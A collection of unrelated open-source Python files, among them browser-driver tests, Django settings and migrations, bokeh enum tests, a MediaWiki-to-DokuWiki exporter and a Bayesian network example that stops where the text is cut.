from .is_element_present_nojs import IsElementPresentNoJSTest
@unittest.skipIf(
sys.version_info[0] > 2,
"zope.testbrowser is not currently compatible with Python 3",
)
class ZopeTestBrowserDriverTest(
BaseBrowserTests, IsElementPresentNoJSTest, unittest.TestCase
):
@classmethod
def setUpClass(cls):
cls.browser = Browser("zope.testbrowser", wait_time=0.1)
def setUp(self):
self.browser.visit(EXAMPLE_APP)
@classmethod
def tearDownClass(self):
self.browser.quit()
def test_should_support_with_statement(self):
with Browser("zope.testbrowser"):
pass
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "mockfile.txt"
)
self.browser.attach_file("file", file_path)
self.browser.find_by_name("upload").click()
html = self.browser.html
self.assertIn("text/plain", html)
self.assertIn(open(file_path).read().encode("utf-8"), html)
def test_forward_to_none_page(self):
"should not fail when trying to forward to none"
browser = Browser("zope.testbrowser")
browser.visit(EXAMPLE_APP)
browser.forward()
self.assertEqual(EXAMPLE_APP, browser.url)
browser.quit()
def test_cant_switch_to_frame(self):
"zope.testbrowser should not be able to switch to frames"
with self.assertRaises(NotImplementedError) as cm:
self.browser.get_iframe("frame_123")
self.fail()
e = cm.exception
self.assertEqual("zope.testbrowser doesn't support frames.", e.args[0])
def test_simple_type(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.type("query", "with type method")
def test_simple_type_on_element(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("query").type("with type method")
def test_can_clear_password_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("password").first.clear()
def test_can_clear_tel_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("telephone").first.clear()
def test_can_clear_text_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("query").first.clear()
def test_slowly_typing(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.type("query", "with type method", slowly=True)
def test_slowly_typing_on_element(self):
"""
zope.testbrowser won't support type method
on element because it doesn't interac with JavaScript
"""
with self.assertRaises(NotImplementedError):
query = self.browser.find_by_name("query")
query.type("with type method", slowly=True)
def test_cant_mouseover(self):
"zope.testbrowser should not be able to put the mouse over the element"
with self.assertRaises(NotImplementedError):
self.browser.find_by_css("#visible").mouse_over()
def test_cant_mouseout(self):
"zope.testbrowser should not be able to mouse out of an element"
with self.assertRaises(NotImplementedError):
self.browser.find_by_css("#visible").mouse_out()
def test_links_with_nested_tags_xpath(self):
links = self.browser.find_by_xpath('//a/span[text()="first bar"]/..')
self.assertEqual(
len(links),
1,
'Found not exactly one link with a span with text "BAR ONE". %s'
% (map(lambda item: item.outer_html, links)),
)
def test_finding_all_links_by_non_ascii_text(self):
"should find links by non ascii text"
non_ascii_encodings = {
"pangram_pl": u"Jeżu klątw, spłódź Finom część gry hańb!",
"pangram_ja": u"天 地 星 空",
"pangram_ru": u"В чащах юга жил бы цитрус? Да, но фальшивый экземпляр!",
"pangram_eo": u"Laŭ Ludoviko Zamenhof bongustas freŝa ĉeĥa manĝaĵo kun spicoj.",
}
for key, text in non_ascii_encodings.iteritems():
link = self.browser.find_link_by_text(text)
self.assertEqual(key, link["id"])
|
from decimal import Decimal
from shop.cart.cart_modifiers_base import BaseCartModifier
class TextOptionsOptionsCartModifier(BaseCartModifier):
'''
This modifier adds an extra field to the cart to let the lineitem "know"
about product options and their respective price.
'''
def process_cart_item(self, cart_item, state):
'''
This adds a list of price modifiers depending on the product options
the client selected for the current cart_item (if any)
'''
# process text_options as passed through the variation object
if cart_item.variation.has_key('text_options'):
for value in cart_item.variation['text_options'].itervalues():
label = value['name'] + ': ' + value['text']
price = Decimal(value['price']) * len(value['text']) * cart_item.quantity
# Don't forget to update the running total!
cart_item.current_total += price
cart_item.extra_price_fields.append((label, price))
return cart_item
|
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('My Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
import tempfile, os
from django import contrib
tempdata = tempfile.mkdtemp()
approot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
adminroot = os.path.join(contrib.__path__[0], 'admin')
DATABASES = {
'default': {
'NAME': os.path.join(tempdata, 'signalqueue-test.db'),
'TEST_NAME': os.path.join(tempdata, 'signalqueue-test.db'),
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
}
}
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
MEDIA_ROOT = os.path.join(approot, 'static')
MEDIA_URL = '/face/'
STATIC_ROOT = os.path.join(adminroot, 'static', 'admin')[0]
STATIC_URL = '/staticfiles/'
ADMIN_MEDIA_PREFIX = '/admin-media/'
ROOT_URLCONF = 'signalqueue.settings.urlconf'
TEMPLATE_DIRS = (
os.path.join(approot, 'templates'),
os.path.join(adminroot, 'templates'),
os.path.join(adminroot, 'templates', 'admin'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
#"django.core.context_processors.i18n", this is AMERICA
"django.core.context_processors.media",
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.staticfiles',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django_nose',
'djcelery',
'delegate',
'signalqueue',
)
LOGGING = dict(
version=1,
disable_existing_loggers=False,
formatters={ 'standard': { 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s' }, },
handlers={
'default': { 'level':'DEBUG', 'class':'logging.StreamHandler', 'formatter':'standard', },
'nil': { 'level':'DEBUG', 'class':'django.utils.log.NullHandler', },
},
loggers={
'signalqueue': { 'handlers': ['default'], 'level': 'INFO', 'propagate': False },
},
root={ 'handlers': ['default'], 'level': 'INFO', 'propagate': False },
)
SQ_QUEUES = {
'default': { # you need at least one dict named 'default' in SQ_QUEUES
'ENGINE': 'signalqueue.worker.backends.RedisSetQueue', # required - full path to a QueueBase subclass
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(port=8356),
},
'listqueue': {
'ENGINE': 'signalqueue.worker.backends.RedisQueue',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(port=8356),
},
'db': {
'ENGINE': 'signalqueue.worker.backends.DatabaseQueueProxy',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(app_label='signalqueue',
modl_name='EnqueuedSignal'),
},
'celery': {
'ENGINE': 'signalqueue.worker.celeryqueue.CeleryQueue',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(celery_queue_name='inactive',
transport='redis', port=8356),
},
}
SQ_ADDITIONAL_SIGNALS=['signalqueue.tests']
SQ_WORKER_PORT = 11201
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
try:
from kombu import Queue
except ImportError:
pass
else:
CELERY_DEFAULT_QUEUE = 'default'
CELERY_DEFAULT_ROUTING_KEY = 'default'
CELERY_DEFAULT_EXCHANGE_TYPE = 'direct'
CELERY_QUEUES = (
Queue('default', routing_key='default.#'),
Queue('yodogg', routing_key='yodogg.#'),
)
CELERY_ALWAYS_EAGER = True
BROKER_URL = 'redis://localhost:8356/0'
BROKER_HOST = "localhost"
BROKER_BACKEND = "redis"
REDIS_PORT = 8356
REDIS_HOST = "localhost"
BROKER_USER = ""
BROKER_PASSWORD = ""
BROKER_VHOST = "0"
REDIS_DB = 0
REDIS_CONNECT_RETRY = True
CELERY_SEND_EVENTS = True
CELERY_RESULT_BACKEND = "redis://localhost:8356/0"
CELERY_TASK_RESULT_EXPIRES = 10
CELERYBEAT_SCHEDULER = "djcelery.schedulers.DatabaseScheduler"
try:
import djcelery
except ImportError:
pass
else:
djcelery.setup_loader()
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
|
from setuptools import setup
setup(
name='pfile-tools',
version='0.5.0',
author='Nathan Vack',
author_email='njvack@wisc.edu',
license='BSD License',
url='https://github.com/njvack/pfile-tools',
packages=['pfile_tools'],
entry_points={
'console_scripts': [
'dump_pfile_header = pfile_tools.scripts.dump_pfile_header:main',
'anonymize_pfile = pfile_tools.scripts.anonymize_pfile:main'
]}
)
|
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
from bokeh.colors import named
from bokeh.palettes import __palettes__
import bokeh.core.enums as bce
def test_Enumeration_default():
e = bce.Enumeration()
assert e.__slots__ == ()
class Test_enumeration(object):
def test_basic(self):
e = bce.enumeration("foo", "bar", "baz")
assert isinstance(e, bce.Enumeration)
assert str(e) == "Enumeration(foo, bar, baz)"
assert [x for x in e] == ["foo", "bar", "baz"]
for x in ["foo", "bar", "baz"]:
assert x in e
assert "junk" not in e
def test_case(self):
e = bce.enumeration("foo", "bar", "baz", case_sensitive=False)
assert isinstance(e, bce.Enumeration)
assert str(e) == "Enumeration(foo, bar, baz)"
assert [x for x in e] == ["foo", "bar", "baz"]
for x in ["foo", "FOO", "bar", "bAr", "baz", "BAZ"]:
assert x in e
assert "junk" not in e
def test_default(self):
# this is private but used by properties
e = bce.enumeration("foo", "bar", "baz")
assert e._default == "foo"
def test_len(self):
e = bce.enumeration("foo", "bar", "baz")
assert len(e) == 3
class Test_bce(object):
def test_Anchor(self):
assert tuple(bce.Anchor) == (
"top_left", "top_center", "top_right",
"center_left", "center", "center_right",
"bottom_left", "bottom_center", "bottom_right"
)
def test_AngleUnits(self):
assert tuple(bce.AngleUnits) == ('deg', 'rad')
def test_ButtonType(self):
assert tuple(bce.ButtonType) == ("default", "primary", "success", "warning", "danger")
def test_DashPattern(self):
assert tuple(bce.DashPattern) ==("solid", "dashed", "dotted", "dotdash", "dashdot")
def test_DateFormat(self):
assert tuple(bce.DateFormat) == ("ATOM", "W3C", "RFC-3339", "ISO-8601", "COOKIE", "RFC-822",
"RFC-850", "RFC-1036", "RFC-1123", "RFC-2822", "RSS", "TIMESTAMP")
def test_DatetimeUnits(self):
assert tuple(bce.DatetimeUnits) == ("microseconds", "milliseconds", "seconds", "minsec",
"minutes", "hourmin", "hours", "days", "months", "years")
def test_Dimension(self):
assert tuple(bce.Dimension) == ("width", "height")
def test_Dimensions(self):
assert tuple(bce.Dimensions) == ("width", "height", "both")
def test_Direction(self):
assert tuple(bce.Direction) == ("clock", "anticlock")
def test_FontStyle(self):
assert tuple(bce.FontStyle) == ('normal', 'italic', 'bold', 'bold italic')
def test_HoldPolicy(self):
assert tuple(bce.HoldPolicy) == ("combine", "collect")
def test_HorizontalLocation(self):
assert tuple(bce.HorizontalLocation) == ("left", "right")
def test_JitterRandomDistribution(self):
assert tuple(bce.JitterRandomDistribution) == ("uniform", "normal")
def test_LatLon(self):
assert tuple(bce.LatLon) == ("lat", "lon")
def test_LegendClickPolicy(self):
assert tuple(bce.LegendClickPolicy) == ("none", "hide", "mute")
def test_LegendLocation(self):
assert tuple(bce.LegendLocation) == (
"top_left", "top_center", "top_right",
"center_left", "center", "center_right",
"bottom_left", "bottom_center", "bottom_right"
)
def test_LineCap(self):
assert tuple(bce.LineCap) == ("butt", "round", "square")
def test_LineDash(self):
assert tuple(bce.LineDash) == ("solid", "dashed", "dotted", "dotdash", "dashdot")
def test_LineJoin(self):
assert tuple(bce.LineJoin) == ("miter", "round", "bevel")
def test_Location(self):
assert tuple(bce.Location) == ("above", "below", "left", "right")
def test_MapType(self):
assert tuple(bce.MapType) == ("satellite", "roadmap", "terrain", "hybrid")
def test_MarkerType(self):
assert tuple(bce.MarkerType) == ("asterisk", "circle", "circle_cross", "circle_x", "cross",
"dash", "diamond", "diamond_cross", "hex", "inverted_triangle",
"square", "square_cross", "square_x", "triangle", "x")
def test_NamedColor(self):
assert len(tuple(bce.NamedColor)) == 147
assert tuple(bce.NamedColor) == tuple(named.__all__)
def test_NumeralLanguage(self):
assert tuple(bce.NumeralLanguage) == ("be-nl", "chs", "cs", "da-dk", "de-ch", "de", "en",
"en-gb", "es-ES", "es", "et", "fi", "fr-CA", "fr-ch",
"fr", "hu", "it", "ja", "nl-nl", "pl", "pt-br",
"pt-pt", "ru", "ru-UA", "sk", "th", "tr", "uk-UA")
def test_Orientation(self):
assert tuple(bce.Orientation) == ("horizontal", "vertical")
def test_OutputBackend(self):
assert tuple(bce.OutputBackend) == ("canvas", "svg", "webgl")
def test_PaddingUnits(self):
assert tuple(bce.PaddingUnits) == ("percent", "absolute")
def test_Palette(self):
assert tuple(bce.Palette) == tuple(__palettes__)
def test_RenderLevel(self):
assert tuple(bce.RenderLevel) == ("image", "underlay", "glyph", "annotation", "overlay")
def test_RenderMode(self):
assert tuple(bce.RenderMode) == ("canvas", "css")
def test_RoundingFunction(self):
assert tuple(bce.RoundingFunction) == ("round", "nearest", "floor", "rounddown", "ceil", "roundup")
def test_SizingMode(self):
assert tuple(bce.SizingMode) == ("stretch_width", "stretch_height", "stretch_both", "scale_width", "scale_height", "scale_both", "fixed")
def test_SliderCallbackPolicy(self):
assert tuple(bce.SliderCallbackPolicy) == ("continuous", "throttle", "mouseup")
def test_SortDirection(self):
assert tuple(bce.SortDirection) == ("ascending", "descending")
def test_SpatialUnits(self):
assert tuple(bce.SpatialUnits) == ("screen", "data")
def test_StartEnd(self):
assert tuple(bce.StartEnd) == ("start", "end")
def test_StepMode(self):
assert tuple(bce.StepMode) == ("before", "after", "center")
def test_TextAlign(self):
assert tuple(bce.TextAlign) == ("left", "right", "center")
def test_TextBaseline(self):
assert tuple(bce.TextBaseline) == ("top", "middle", "bottom", "alphabetic", "hanging", "ideographic")
def test_TickLabelOrientation(self):
assert tuple(bce.TickLabelOrientation) == ("horizontal", "vertical", "parallel", "normal")
def test_TooltipAttachment(self):
assert tuple(bce.TooltipAttachment) == ("horizontal", "vertical", "left", "right", "above", "below")
def test_TooltipFieldFormatter(self):
assert tuple(bce.TooltipFieldFormatter) == ("numeral", "datetime", "printf")
def test_VerticalAlign(self):
assert tuple(bce.VerticalAlign) == ("top", "middle", "bottom")
def test_VerticalLocation(self):
assert tuple(bce.VerticalLocation) == ("above", "below")
def test_enums_contents():
assert [x for x in dir(bce) if x[0].isupper()] == [
'Align',
'Anchor',
'AngleUnits',
'ButtonType',
'DashPattern',
'DateFormat',
'DatetimeUnits',
'Dimension',
'Dimensions',
'Direction',
'Enumeration',
'FontStyle',
'HoldPolicy',
'HorizontalLocation',
'JitterRandomDistribution',
'LatLon',
'LegendClickPolicy',
'LegendLocation',
'LineCap',
'LineDash',
'LineJoin',
'Location',
'MapType',
'MarkerType',
'NamedColor',
'NumeralLanguage',
'Orientation',
'OutputBackend',
'PaddingUnits',
'Palette',
'RenderLevel',
'RenderMode',
'RoundingFunction',
'SizingMode',
'SizingPolicy',
'SliderCallbackPolicy',
'SortDirection',
'SpatialUnits',
'StartEnd',
'StepMode',
'TextAlign',
'TextBaseline',
'TickLabelOrientation',
'TooltipAttachment',
'TooltipFieldFormatter',
'TrackPolicy',
'VerticalAlign',
'VerticalLocation',
]
|
"""
Methods for exporting mediawiki pages & images to a dokuwiki data/ directory.
Tested with Dokuwiki 2014-05-05 "Ponder Stibbons".
Copyright (C) 2014 Angus Gratton
Licensed under New BSD License as described in the file LICENSE.
"""
from __future__ import print_function, unicode_literals, absolute_import, division
import os, os.path, gzip, shutil, re, requests, calendar, codecs, sys
from requests.auth import HTTPBasicAuth
import wikicontent
import simplemediawiki
import names
class Exporter(object):
def __init__(self, rootpath):
# verify the dokuwiki rootpath exists
self.root = rootpath
if not os.path.isdir(rootpath):
raise RuntimeError("Dokuwiki root path '%s' does not point to a directory" % rootpath)
# check a 'data' directory exists, establish pathes for each subdirectory
self.data = os.path.join(rootpath, "data")
if not os.path.isdir(self.data):
raise RuntimeError("Dokuwiki root path '%s' does not contain a data directory" % rootpath)
# create meta, attic, pages subdirs if they don't exist (OK to have deleted them before the import)
self.meta = os.path.join(self.data, "meta")
self.attic = os.path.join(self.data, "attic")
self.pages = os.path.join(self.data, "pages")
for subdir in [ self.meta, self.attic, self.pages]:
ensure_directory_exists(subdir)
def write_pages(self, pages):
"""
Given 'pages' as a list of mediawiki pages with revisions attached, export them to dokuwiki pages
"""
for page in pages:
self._convert_page(page)
self._aggregate_changes(self.meta, "_dokuwiki.changes")
def write_images(self, images, file_namespace, http_user=None, http_pass=None):
"""
Given 'images' as a list of mediawiki image metadata API entries,
download and write out dokuwiki images. Does not bring over revisions.
Images are all written to the file_namespace specified (file: by default), to match mediawiki.
"""
auth=None if http_user is None else HTTPBasicAuth(http_user, http_pass)
file_namespace = file_namespace.lower()
filedir = os.path.join(self.data, "media", file_namespace)
ensure_directory_exists(filedir)
filemeta = os.path.join(self.data, "media_meta", file_namespace)
ensure_directory_exists(filemeta)
for image in images:
# download the image from the Mediawiki server
print("Downloading %s..." % image['name'])
r = requests.get(image['url'], auth=auth)
# write the actual image out to the data/file directory
name = make_dokuwiki_pagename(image['name'])
imagepath = os.path.join(filedir, name)
with open(imagepath, "wb") as f:
f.write(r.content)
# set modification time appropriately
timestamp = get_timestamp(image)
os.utime(imagepath, (timestamp,timestamp))
# write a .changes file out to the media_meta/file directory
changepath = os.path.join(filemeta, "%s.changes" % name)
with codecs.open(changepath, "w", "utf-8") as f:
fields = (str(timestamp), "::1", "C", u"%s:%s"%(file_namespace,name), "", "created")
f.write(u"\t".join(fields) + "\r\n")
# aggregate all the new changes to the media_meta/_media.changes file
self._aggregate_changes(os.path.join(self.data, "media_meta"), "_media.changes")
def _convert_page(self, page):
""" Convert the supplied mediawiki page to a Dokuwiki page """
print("Converting %d revisions of page '%s'..." %
(len(page["revisions"]), page['title']))
# Sanitise the mediawiki pagename to something matching the dokuwiki pagename convention
full_title = make_dokuwiki_pagename(page['title'])
# Mediawiki pagenames can contain namespace :s, convert these to dokuwiki / paths on the filesystem (becoming : namespaces in dokuwiki)
subdir, pagename = os.path.split(full_title.replace(':','/'))
pagedir = os.path.join(self.pages, subdir)
metadir = os.path.join(self.meta, subdir)
atticdir = os.path.join(self.attic, subdir)
for d in pagedir, metadir, atticdir:
ensure_directory_exists(d)
# Walk through the list of revisions
revisions = list(reversed(page["revisions"])) # order as oldest first
for revision in revisions:
is_current = (revision == revisions[-1])
is_first = (revision == revisions[0])
content = wikicontent.convert_pagecontent(full_title, revision["*"])
timestamp = get_timestamp(revision)
comment = revision.get("comment", "").replace("\t", " ").split("\n")[0]
# path to the .changes metafile
changespath = os.path.join(metadir, "%s.changes"%pagename)
# for current revision, create 'pages' .txt
if is_current:
txtpath = os.path.join(pagedir, "%s.txt"%pagename)
with codecs.open(txtpath, "w", "utf-8") as f:
f.write(content)
os.utime(txtpath, (timestamp,timestamp))
# create gzipped attic revision
atticname = "%s.%s.txt.gz" % (pagename, timestamp)
atticpath = os.path.join(atticdir, atticname).encode("utf-8")
with gzip.open(atticpath, "wb") as f:
f.write(content.encode("utf-8"))
os.utime(atticpath, (timestamp,timestamp))
# append entry to page's 'changes' metadata index
with codecs.open(changespath, "w" if is_first else "a", "utf-8") as f:
changes_title = full_title.replace("/", ":")
fields = (str(timestamp), "::1", "C" if is_first else "E", changes_title, names.clean_user(revision["user"]), comment)
print(u"\t".join(fields), file=f)
def _aggregate_changes(self, metadir, aggregate):
"""
Rebuild the wiki-wide changelong from meta/ to meta/_dokuwiki.changes or
from media_meta to media_meta/_media.changes
This is a Pythonified version of https://www.dokuwiki.org/tips:Recreate_Wiki_Change_Log
"""
lines = []
for root, dirs, files in os.walk(metadir):
for changesfile in files:
if changesfile == aggregate or not changesfile.endswith(".changes"):
continue
with codecs.open(os.path.join(root,changesfile), "r", "utf-8") as f:
lines += f.readlines()
lines = sorted(lines, key=lambda r: int(r.split("\t")[0]))
with codecs.open(os.path.join(metadir, aggregate), "w", "utf-8") as f:
f.writelines(lines)
def fixup_permissions(self):
""" Fix permissions under the data directory
This means applying the data directory's permissions and ownership to all underlying parts.
If this fails due to insufficient privileges then it just prints a warning and continues on.
"""
stat = os.stat(self.data)
try:
for root, dirs, files in os.walk(self.data):
for name in files:
path = os.path.join(root, name)
os.chmod(path, stat.st_mode & 0o666)
os.chown(path, stat.st_uid, stat.st_gid)
for name in dirs:
path = os.path.join(root, name)
os.chmod(path, stat.st_mode)
os.chown(path, stat.st_uid, stat.st_gid)
except OSError:
print("WARNING: Failed to set permissions under the data directory (not owned by process?) May need to be manually fixed.")
def invalidate_cache(self):
""" Invalidate cached pages by updating modification date of a config file
If this fails due to insufficient privileges then it just prints a warning and continues on.
"""
confpath = os.path.join(self.root, "conf", "local.php")
try:
os.utime('myfile', None)
except OSError:
print(CACHE_WARNING_MSG % confpath)
CACHE_WARNING_MSG = """WARNING: Failed to invalidate page cache by updating config file timestamp.
If pre-existing pages exist in Dokuwiki, run the following command (with sufficient privileges):
touch "%s"
"""
def get_timestamp(node):
"""
Return a dokuwiki-Compatible Unix int timestamp for a mediawiki API page/image/revision
"""
dt = simplemediawiki.MediaWiki.parse_date(node['timestamp'])
return int(calendar.timegm(dt.utctimetuple()))
def ensure_directory_exists(path):
if not os.path.isdir(path):
os.makedirs(path)
def make_dokuwiki_pagename(mediawiki_name):
"""
Convert a canonical mediawiki pagename to a dokuwiki pagename
Any namespacing that is in the form of a / is replaced with a :
"""
result = mediawiki_name.replace(" ","_")
result = names.clean_id(camel_to_underscore(result)).replace("/",":")
result = codecs.encode(result, sys.getfilesystemencoding(), "replace")
return result
def make_dokuwiki_heading_id(mw_heading_name):
"""
Convert a Mediawiki internal anchor heading link to the Dokuwiki anchor heading link id
Equivalent function in dokuwiki is _headerToLink in inc/parser/xhtml.php
which calls sectionID in inc/pageutils.php
"""
result = names.clean_id(mw_heading_name, True)
result = re.sub(r'[:.]', '', result)
nums_stripped = result.lstrip("0123456789_-")
if len(nums_stripped):
return nums_stripped
else:
return "section"+re.sub(r"[^0-9]+", "", result)
def camel_to_underscore(camelcase):
"""
Convert a camelcased string to underscore_delimited (tweaked from this StackOverflow answer)
http://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-camelcase-to-camel-case
"""
s1 = re.sub('(^/_)([A-Z][a-z]+)', r'\1_\2', camelcase)
s2 = re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
return s2
|
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import logging
log = logging.getLogger(__name__)
from .trajectories import Trajectories
try: # pragma: no cover
from . import draw
__all__ = ['Trajectories', 'draw']
except ImportError: # pragma: no cover
log.warning('''Matplotlib can't be imported,'''
'''drawing module won't be available ''')
__all__ = ['Trajectories']
|
from setuptools import setup
import os
execfile(os.path.join('sheetsync','version.py'))
with open('README.rst') as fh:
long_description = fh.read()
with open('requirements.txt') as fh:
requirements = [line.strip() for line in fh.readlines()]
setup(
name='sheetsync',
version=__version__,
description="Synchronize rows of data with a google spreadsheet",
long_description=long_description,
author='Mark Brenig-Jones',
author_email='markbrenigjones@gmail.com',
url='https://github.com/mbrenig/SheetSync/',
packages=['sheetsync'],
platforms='any',
install_requires=requirements,
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
],
)
|
from django.db.models import manager
from .query import QuerySet
__all__ = 'Manager',
class Manager(manager.Manager.from_queryset(QuerySet)):
use_for_related_fields = True
use_in_migrations = True
|
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ImagrUser',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, max_length=30, verbose_name='username', validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username.', 'invalid')])),
('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),
('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),
('email', models.EmailField(max_length=75, verbose_name='email address', blank=True)),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('our_date_joined_field', models.DateField(auto_now_add=True)),
('our_is_active_field', models.BooleanField(default=False)),
('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),
('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')),
('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),
],
options={
'abstract': False,
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20)),
('description', models.CharField(max_length=140)),
('date_uploaded', models.DateField(auto_now_add=True)),
('date_modified', models.DateField(auto_now=True)),
('date_published', models.DateField()),
('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20)),
('description', models.CharField(max_length=140)),
('date_uploaded', models.DateField(auto_now_add=True)),
('date_modified', models.DateField(auto_now=True)),
('date_published', models.DateField()),
('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),
('image_url', models.CharField(default=b'Photo Not Found', max_length=1024)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='album',
name='cover',
field=models.ForeignKey(related_name='Album_cover', to='imagr_app.Photo'),
preserve_default=True,
),
migrations.AddField(
model_name='album',
name='photos',
field=models.ManyToManyField(related_name='Album_photos', to='imagr_app.Photo'),
preserve_default=True,
),
migrations.AddField(
model_name='album',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
]
|
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_endor_ewok_medium4.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
from Queue import *
import threading
import atexit
remote_action_PowerOn = RemoteAction()
remote_action_PowerOff = RemoteAction()
remote_action_SetInput = RemoteAction()
def local_action_activate(x = None):
'''{ "title": "Turn on", "desc": "Turn on." }'''
queue.put({'function': 'remote_action_PowerOn', 'delay': 120})
queue.put({'function': 'remote_action_SetInput', 'arg':{"source":"DIGITAL", "number":1}, 'delay': 5})
print 'Activated'
def local_action_deactivate(x = None):
'''{ "title": "Turn off", "desc": "Turn off." }'''
queue.put({'function': 'remote_action_PowerOff', 'delay': 120})
print 'Deactivated'
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.isSet():
if queue.empty() != True:
job = queue.get()
try:
print "Calling command " + job['function']
func = globals()[job['function']]
arg = job['args'] if 'args' in job else ''
func.call(arg)
self.event.wait(job['delay'])
queue.task_done()
except Exception, e:
print e
print "Failed to call command " + job['function']
else:
self.event.wait(1)
def stop(self):
self.event.set()
queue = Queue()
th = TimerClass()
@atexit.register
def cleanup():
print 'shutdown'
th.stop()
def main():
th.start()
print 'Nodel script started.'
|
'''The Example from Huang and Darwiche's Procedural Guide'''
from __future__ import division
from bayesian.factor_graph import *
from bayesian.utils import make_key
def f_a(a):
return 1 / 2
def f_b(a, b):
tt = dict(
tt=0.5,
ft=0.4,
tf=0.5,
ff=0.6)
return tt[make_key(a, b)]
def f_c(a, c):
tt = dict(
tt=0.7,
ft=0.2,
tf=0.3,
ff=0.8)
return tt[make_key(a, c)]
def f_d(b, d):
tt = dict(
tt=0.9,
ft=0.5,
tf=0.1,
ff=0.5)
return tt[make_key(b, d)]
def f_e(c, e):
tt = dict(
tt=0.3,
ft=0.6,
tf=0.7,
ff=0.4)
return tt[make_key(c, e)]
def f_f(d, e, f):
tt = dict(
ttt=0.01,
ttf=0.99,
tft=0.01,
tff=0.99,
ftt=0.01,
ftf=0.99,
fft=0.99,
fff=0.01)
